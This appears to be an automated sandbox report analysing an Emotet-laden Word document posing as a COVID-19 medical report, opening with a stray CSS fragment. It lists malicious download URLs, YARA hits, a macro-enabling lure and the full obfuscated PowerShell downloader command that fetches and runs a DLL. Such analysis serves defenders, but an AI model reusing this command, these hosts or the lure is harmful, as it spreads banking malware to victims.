      padding-right: 15px;
      padding-left: 15px;
    }

    .row:before, .row:after {
      display: table;
      content: " ";
    }

    .col-md-6 {
      width: 50%;
    }

    .col-md-push-3 {
      margin-left: 25%;
    }

    h1 {
      font-size: 48px;
      font-weight: 300;
      margin: 0 0 20px 0;
    }

    .lead {
      font-size: 21px;
      font-weight: 200;
      margin-bottom: 20px;
    }

    p {
      margin: 0 0 10px;
    }

    a {
      color: #3
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp String found in binary or memory: http://bhaktivrind.com
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp String found in binary or memory: http://bhaktivrind.com/cgi-bin/JBbb8/
Source: powershell.exe, 00000005.00000002.2106818585.0000000003B54000.00000004.00000001.sdmp String found in binary or memory: http://cab.mH
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp String found in binary or memory: http://cab.mykfn.com
Source: powershell.exe, 00000005.00000002.2107203332.000000001B538000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp String found in binary or memory: http://cab.mykfn.com/admin/X/
Source: powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp String found in binary or memory: http://cambiasuhistoria.growlab.es/wp-content/hGhY2/
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp String found in binary or memory: http://cambiasuhistoria.growlab.es/wp-content/hGhY2/P
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp String found in binary or memory: http://gocphongthe.com/wp-content/lMMC/
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp String found in binary or memory: http://ie-best.net
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp String found in binary or memory: http://ie-best.net/online-timer-kvhxz/ilXL/
Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmp String found in binary or memory: http://java.c
Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000005.00000002.2098069064.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2122352359.0000000002820000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp String found in binary or memory: http://vanddnabhargave.com
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp String found in binary or memory: http://vanddnabhargave.com/asset/W9o/
Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2098069064.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2122352359.0000000002820000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmp String found in binary or memory: http://www.letscompareonline.com/de.letscompareonline.com/wYd/
Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea7
Source: rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmp String found in binary or memory: https://sectigo.com/CPS0D

E-Banking Fraud:

Yara detected Emotet
Source: Yara match File source: 00000008.00000002.2121216068.0000000000290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2110577655.0000000000230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2145222435.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2334223344.0000000000160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2121359913.0000000000700000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2122851678.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2145232978.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2155705121.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2335867328.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2110590102.0000000000250000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2155718494.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2131220245.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2131240758.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2334238430.0000000000180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2149683472.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2133987769.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2156224518.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.170000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.700000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.180000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.170000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available fOr protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 6,262 N@m 13 ;a 1009
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available fOr protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll
Very long command line found
Source: unknown Process created: Commandline size = 5949
Source: unknown Process created: Commandline size = 5848
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5848
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Dgmlr\
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: IU-8549 Medical report COVID-19.doc OLE, VBA macro line: Private Sub Document_open()
Source: VBA code instrumentation OLE, VBA macro: Module Sky5mdbfre3xe7q8, Function Document_open Name: Document_open
Document contains embedded VBA macros
Source: IU-8549 Medical report COVID-19.doc OLE indicator, VBA macros: true
Source: rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.evad.winDOC@20/8@6/100
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$-8549 Medical report COVID-19.doc
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRBAD6.tmp
Source: IU-8549 Medical report COVID-19.doc OLE indicator, Word Document stream: true
Source: IU-8549 Medical report COVID-19.doc OLE document summary: title field not present or empty
Source: IU-8549 Medical report COVID-19.doc OLE document summary: edited time not present or 0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{..................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....x.......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....0.................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v............0.......................j....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................v.............}..v....(.......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................v..j....`Fm...............v.............}..v....X.......0.......................r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................v.............}..v............0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ .......v..j....`Fm...............v.............}..v.... .......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j......................v.............}..v....X.......0................Cm............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................h.j....E.................v.............}..v............0...............x.m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................h.j......Q...............v.............}..v....8.......0...............x.m............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Windows\System32\msg.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: IU-8549 Medical report COVID-19.doc Virustotal: Detection: 63%
Source: IU-8549 Medical report COVID-19.doc Metadefender: Detection: 56%
Source: IU-8549 Medical report COVID-19.doc ReversingLabs: Detection: 82%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBD
AEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcA
Source: unknown Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc 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
Source: unknown Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',hyhQYxhuLCMLb
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dgmlr\ngcj.eda',#1
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',nCbdzah
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Zfrhfthwazxcccc\whpjzcoocbdvfd.agu',#1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
